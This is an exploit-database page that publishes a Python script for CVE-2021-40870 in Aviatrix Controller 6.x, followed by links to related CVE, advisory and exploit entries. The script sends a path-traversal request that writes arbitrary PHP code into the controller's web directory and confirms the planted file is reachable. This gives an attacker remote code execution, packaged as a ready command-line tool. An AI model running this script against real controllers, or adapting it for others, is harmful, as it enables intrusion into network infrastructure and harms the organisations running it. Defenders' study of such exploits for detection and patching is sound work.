Lucene search
0xJoyGhosh1337DAY-ID-36888HistoryOct 12, 2021 - 12:00 a.m.
Aviatrix Controller 6.x Path Traversal / Code Execution Exploit
2021-10-1200:00:00
0xJoyGhosh
0day.today
349
python script
exploit
path traversal
code execution
aviatrix controller 6.x
vulnerability
EPSS
0.936
Percentile
99.2%
#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""
āāāāā āāāāāā āāāāā āā āāā āāāā āāā āāā āā āāāāā āāāā āāāā āāāā āāāā
āāāāā āāāāāā āāāāā āā āāā āāāā āāā āāā āā āāāāā āāāā āāāā āāāā āāāā
āāāāā āāāāāā āāāāā āā āāā āāāā āāā āāā āā āāāāā āāāā āāāā āāāā āāāā
Author : 0xJoyGhosh
Org : System00 Security
Twitter: @0xjoyghosh
""")
try:
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)
parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)
args = parser.parse_args()
url =f"{args.url}/v1/backend1"
except TypeError:
print("Type -h To See all the options")
except():
exit()
def exploit(url,path,code):
headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/x-www-form-urlencoded"
data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'
resp = requests.post(url, headers=headers, data=data,verify=False)
stat = requests.get(f"{args.url}/v1/{path}",verify=False)
if resp.status_code==200:
if stat.status_code==200:
print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")
print("")
else:
print("[ Exploit successful Creating File Failed ]")
pass
else:
print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')
if args.url is not None:
if args.code is not None:
if args.name is not None:
exploit(url,args.name,args.code)
else:
print('Type -h to see help Menu')
else:
print('Type -h to see help Menu')
else:
print('Type -h to see help Menu')
Related
attackerkb
attackerkb
CVE-2021-40870
2021-09-13 00:00:00
prion
prion
Directory traversal
2021-09-13 08:15:00
cvelist
cvelist
CVE-2021-40870
2021-09-13 07:41:55
cve
cve
CVE-2021-40870
2021-09-13 08:15:13
nuclei
nuclei
Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution
2021-09-30 06:57:47
nvd
nvd
CVE-2021-40870
2021-09-13 08:15:13
hackerone
hackerone
Informatica: CVE-2021-40870 in [āāā]
2021-10-06 04:33:57
Elastic: CVE-2021-40870 on [52.204.160.31]
2021-10-01 20:20:56
githubexploit
githubexploit
Exploit for Relative Path Traversal in Aviatrix Controller
2021-10-08 05:35:40
Exploit for Interpretation Conflict in Aviatrix Controller
2021-10-07 17:19:12
packetstorm
packetstorm
Aviatrix Controller 6.x Path Traversal / Code Execution
2021-10-11 00:00:00
checkpoint_advisories
checkpoint_advisories
Aviatrix Controller Directory Traversal (CVE-2021-40870)
2021-12-30 00:00:00
cisa_kev
cisa_kev
Aviatrix Controller Unrestricted Upload of File
2022-01-18 00:00:00
cisa
cisa
CISA Adds 13 Known Exploited Vulnerabilities to Catalog
2022-01-18 00:00:00